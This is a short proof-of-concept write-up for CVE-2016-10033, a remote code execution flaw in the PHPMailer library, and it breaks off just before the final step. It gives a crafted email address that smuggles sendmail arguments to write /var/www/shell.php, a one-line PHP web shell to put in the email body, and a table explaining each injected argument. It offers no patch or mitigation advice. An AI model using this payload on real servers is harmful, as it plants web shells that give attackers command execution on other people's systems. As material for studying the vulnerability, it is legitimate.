cve-2016-10033-phpmailer-rce
CVE-2016-10033: PHPMailer RCE
CVE-2016-10033 is a critical Remote Code Execution vulnerability affecting multiple versions of PHPMailer, one of the most widely used email-sending libraries in PHP applications.
The vulnerability arises from improper sanitization of user-controlled email addresses, which are later passed to the system’s mail transfer agent (sendmail) as command-line arguments.
Proof of Concept
- Inject
SendmailArguments via Email Address
By injecting extra parameters into the email address, we can instruct sendmail to write arbitrary data to a file:
"attacker@127.0.0.1\" -oQ/tmp/ -X/var/www/shell.php root"@127.0.0.1
Above email payload does:
| Argument | Purpose |
|---|---|
-oQ/tmp/ | Redirects mail queue |
-X/var/www/shell.php | Writes email content to a PHP file |
root | Required to keep syntax valid |
This results in a file being created:
/var/www/shell.php
- Inject PHP Web Shell in Email Body:
<?php system($_GET['0']);?>
When the email is processed, this PHP code is written directly into shell.php.
We may get error like: Message could not be sent. Mailer Error: Could not instantiate mail function. But the file must have been made.
We can then access the file for code execution:
